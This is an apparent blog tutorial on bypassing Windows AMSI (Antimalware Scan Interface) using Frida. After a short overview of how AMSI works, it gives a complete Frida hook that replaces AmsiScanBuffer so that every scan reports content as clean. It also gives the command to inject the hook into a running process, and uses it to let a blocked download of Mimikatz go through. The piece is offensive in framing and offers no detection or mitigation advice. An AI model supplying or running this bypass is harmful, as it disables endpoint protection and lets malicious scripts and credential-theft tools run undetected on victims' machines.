How to Bypass AMSI Protection with Frida

      Nessun commento su How to Bypass AMSI Protection with Frida

AMSI, or Antimalware Scan Interface, is a security feature introduced by Microsoft to enhance real-time detection of malicious scripts, especially those executed via legitimate interpreters like PowerShell, WSH (Windows Script Host), and VBA macros.

It provides a standard API that allows antivirus (AV) and endpoint protection solutions to inspect and analyze script content before it gets executed.

How AMSI Works (High-Level Overview)

Here’s what happens under the hood:

  1. A script is invoked e.g., a PowerShell command or a macro.
  2. Before execution, the interpreter (e.g., powershell.exe) sends the script content to AMSI using functions like AmsiScanBuffer.
  3. AMSI passes the content to the registered antimalware provider (like Microsoft Defender).
  4. The AV scans the content and returns a result (clean, suspicious, or malicious).
  5. If the result is malicious, execution is blocked.

Limitations Frida Bypass

However, AMSI can still be bypassed quite easily. In today’s blog, I’ll show you how to bypass AMSI using Frida.

For demonstration purposes, we’ll attempt to download a file (e.g., Mimikatz) to the target machine, but AMSI will intercept and block the operation

As we can observe, the curl command is blocked because it was detected and prevented by the antivirus software. However, we can use Frida to bypass this limitation.

In this example, we’re using Frida to hook and bypass the AMSI (Antimalware Scan Interface) mechanism on Windows. AMSI is designed to detect and block potentially malicious scripts, such as PowerShell commands, but with this code, we can intercept and modify its behavior. Here’s a breakdown of each part:

// Hook per bypassare AMSI (già fatto in precedenza)
var amsiScanBuffer = Module.findExportByName("amsi.dll", "AmsiScanBuffer");

if (amsiScanBuffer !== null) {
    Interceptor.replace(amsiScanBuffer, new NativeCallback(function (
        amsiContext,
        buffer,
        length,
        contentName,
        amsiSession,
        result
    ) {
        console.log("[*] Intercettata chiamata AmsiScanBuffer");
        Memory.writeU32(result, 0);  // AMSI_RESULT_CLEAN
        return 0;  // S_OK
    }, 'int', ['pointer', 'pointer', 'uint', 'pointer', 'pointer', 'pointer']));
    console.log("[+] Hook applicato a AmsiScanBuffer");
} else {
    console.log("[-] AmsiScanBuffer non trovato!");
}

This script uses Frida to hook into the AmsiScanBuffer function from the amsi.dll library, which is responsible for scanning data for malicious content (like PowerShell scripts). By hooking this function, we can bypass AMSI’s detection.

When the AmsiScanBuffer function is called, the script intercepts it and forces the result to be marked as clean (AMSI_RESULT_CLEAN). This effectively tells AMSI that the content is safe, allowing potentially malicious scripts to execute without being flagged by AMSI or the antivirus software.

If successful, the script prints a confirmation message, otherwise, it reports that the AmsiScanBuffer function was not found.

 frida -p 15464 -l amsi-bypass.js

After executing the Frida script, we can see that we are now able to download the script successfully, bypassing AMSI’s protection